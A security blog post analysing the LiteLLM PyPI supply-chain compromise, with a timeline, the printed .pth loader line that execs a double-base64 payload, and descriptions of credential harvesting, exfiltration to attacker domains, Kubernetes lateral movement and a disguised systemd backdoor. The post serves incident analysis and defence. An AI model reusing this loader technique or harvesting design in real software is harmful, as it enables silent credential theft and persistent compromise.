Tarek Cheikh
Founder & AWS Cloud Architect
Yesterday, one of the most popular Python packages in the AI ecosystem was turned into a weapon. Here is exactly how it happened, what the malware does, and what every developer needs to know.
LiteLLM is an open source Python library that acts as a unified gateway to 100+ LLM providers: OpenAI, Anthropic, Azure, AWS Bedrock, and more. It has about 95 million monthly downloads on PyPI.
Organizations use it as their central LLM proxy. This means that by design, LiteLLM has access to every LLM API key in the organization.
The attacker didn't pick this target randomly.
The LiteLLM compromise was not a standalone attack. It was the third stage of a campaign by a threat actor tracked as TeamPCP.
March 1: Aqua Security, the company behind the vulnerability scanner Trivy, gets breached. Their credential rotation after the incident is incomplete -some tokens survive.
March 19: Using surviving credentials, TeamPCP publishes a compromised version of Trivy. The irony: Trivy is the security scanner organizations run to detect compromises. The attacker compromised the tool that detects compromises.
March 23: Here is the critical link. LiteLLM's CI/CD pipeline had this line in ci_cd/security_scans.sh:
curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh
No version pinning. This installs whatever the latest Trivy is -including the compromised one. When LiteLLM's CI ran its security scan, the poisoned Trivy had access to the CI environment's secrets, including PyPI API tokens belonging to maintainer krrishdholakia.
March 23: The attacker registers the domain litellm.cloud through registrar Spaceship, Inc. The legitimate LiteLLM domain is litellm.ai. The similarity is intentional: models.litellm.cloud looks like a real API endpoint in network logs.
March 24, 08:30 UTC: Using the stolen PyPI token, TeamPCP uploads two malicious versions directly to PyPI:
proxy_server.py.pth file (more on this below)No Git tag was created. No GitHub release. No pull request. The attacker uploaded directly to PyPI, completely bypassing code review.
This is the technical trick that makes the LiteLLM attack so dangerous.
Python has a little known startup mechanism. When the interpreter starts, it scans the site-packages/ directory for files ending in .pth. These files were designed to add directories to Python's import path.
But there is a dangerous feature: any line in a .pth file that starts with import is executed as Python code. Not added to a path. Executed. On every Python interpreter startup. Unconditionally.
This means:
import litellmpython command triggers it, including python --versionThe attacker placed a file called litellm_init.pth (34,628 bytes) inside the wheel package. When installed via pip, it lands in site-packages/. It contains a single line:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c",
"import base64; exec(base64.b64decode(base64.b64decode('PAYLOAD')))"],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
What this does:
subprocess.Popen: Forks a new child process. Popen (not run or call) returns immediately without waiting. The parent Python process continues normally. The user sees no delay, no error, nothing.base64.b64decode(base64.b64decode(...)): Double base64 decoding. The outer decode produces another base64 string. The inner decode produces the actual malware. Double encoding evades scanners that pattern match on known malicious code.exec(...): Executes the decoded 331-line credential harvester in the child process.stdout=DEVNULL, stderr=DEVNULL: Suppresses all output. Silent.There is a catch the attacker apparently didn't fully account for. When the .pth file triggers subprocess.Popen to launch a new Python process, that new process also starts up, scans site-packages/, finds the same .pth file, and triggers it again. And again. And again.
We observed this firsthand in our lab. Starting from a single python3 -c "print('hello')" command:
| Time | Python processes |
|---|---|
| T+0s | 3 (normal) |
| T+1s | 14 |
| T+2s | 55 |
| T+4s | 133 |
| T+13s | 390 |
| T+18s | 509 |
| T+38s | 891 |
| T+40s | Machine dead |
From 3 to 891 Python processes in 38 seconds. The machine ran out of RAM and became completely unresponsive.
This is actually how the attack was originally discovered. Callum McMahon at FutureSearch noticed his machine ran out of RAM when an MCP plugin in the Cursor IDE pulled litellm as a transitive dependency.
Once decoded and executing, the payload is a 331-line Python script that operates in three stages.
The script reads files from well-known paths. Every secret on the machine is a target:
SSH credentials:
~/.ssh/id_rsa, ~/.ssh/id_ed25519: private keys~/.ssh/config: host configurations, jump hosts/etc/ssh/ssh_host_*_key: server host keysCloud provider credentials:
~/.aws/credentials: AWS Access Key ID and Secret169.254.169.254) for IAM role credentialsKubernetes:
~/.kube/config: cluster access/var/run/secrets/kubernetes.io/serviceaccount/tokenApplication secrets:
.env files (recursive search to depth 6)~/.bash_history, ~/.zsh_history).pgpass, .my.cnf, redis.conf)~/.docker/config.json)~/.npmrc)terraform.tfvars, terraform.tfstate).gitlab-ci.yml, .travis.yml)The script doesn't crash if a file doesn't exist. It silently skips it. It runs on any machine: developer laptop, CI runner, production server, Kubernetes pod -and takes whatever is available.
The stolen data is not sent in plaintext:
openssl randopenssl enc -aes-256-cbc -pbkdf2tpcp.tar.gzhttps://models.litellm.cloud/ with an X-Filename headerThe RSA public key is hardcoded in the malware. Only the attacker holds the matching private key. Even if you capture the network traffic, you cannot decrypt the contents.
If the script detects a Kubernetes service account token, it escalates massively:
node-setup-{node_name} in kube-system namespacehostPID: true, hostNetwork: true, privileged: true/hostOne compromised pip install on a developer laptop can lead to every node in the Kubernetes cluster being backdoored.
The malware installs a backdoor that survives pip uninstall:
~/.config/sysmon/sysmon.py: a 44-line Python script~/.config/systemd/user/sysmon.service: a systemd service that auto-starts itThe name "sysmon" is deliberately chosen -it mimics Microsoft's legitimate system monitoring tool. The script:
https://checkmarx.zone/raw (the attacker's C2 server) every 50 minutes for new payloadsAfter this step, even pip uninstall litellm doesn't help. The backdoor lives outside pip's control.
| v1.82.7 | v1.82.8 | |
|---|---|---|
Injection in proxy_server.py | Yes | Yes |
.pth file | No | Yes |
| Triggers when | You import litellm.proxy | Any Python command |
| Must use litellm? | Yes | No, just having it installed is enough |
Version 1.82.7 was targeted -it only fires if you actually use the proxy module. Version 1.82.8 was a carpet bomb -every Python invocation triggers it.
12:00 UTC: Callum McMahon at FutureSearch notices his machine running out of RAM.
13:48 UTC: Security issue disclosed on GitHub.
15:00 UTC: PyPI yanks versions 1.82.7 and 1.82.8.
16:00 UTC: PyPI quarantines the entire litellm package.
The attack window was approximately 6.5 hours. During that time, anyone who ran pip install litellm or pip install --upgrade litellm received the compromised version.
Several factors aligned:
curl | sh without version pinning, inheriting Trivy's compromise.If you installed litellm 1.82.7 or 1.82.8:
pip show litellm to check your versionlitellm_init.pth in your Python site-packages~/.config/sysmon/sysmon.py on any affected machinenode-setup-* in your Kubernetes clustersFor everyone:
curl | sh.site-packages/ for .pth files containing executable code.In Part 2, we detonate the real compromised package on an isolated EC2 instance and capture every stage of the attack with mitmproxy, strace, and inotifywait. We see the fork bomb in real-time, watch the credential harvester read our honeypot files, and intercept the exfiltration attempt.
Full analysis repo with malware samples, lab scripts, and evidence: https://github.com/TocConsulting/litellm-supply-chain-attack-analysis
This article is just the start. Get the full picture with our free whitepaper - 8 chapters covering IAM, S3, VPC, monitoring, agentic AI security, compliance, and a prioritized action plan with 50+ CLI commands.
Stop sending your IAM policies, CloudTrail logs, and infrastructure code to third-party APIs. Run LLMs locally with Ollama on Apple Silicon — private, offline, fast. Complete setup guide with AWS security use cases.
We obtained the actual compromised litellm packages, set up a disposable EC2 instance with honeypot credentials and mitmproxy, and detonated the malware. Full evidence: fork bomb, credential theft in under 2 seconds, IMDS queries, AWS API calls, and C2 exfiltration.
Free, open-source security reference cards covering attack vectors, misconfigurations, enumeration commands, privilege escalation, persistence, detection, and defense for 60 AWS services.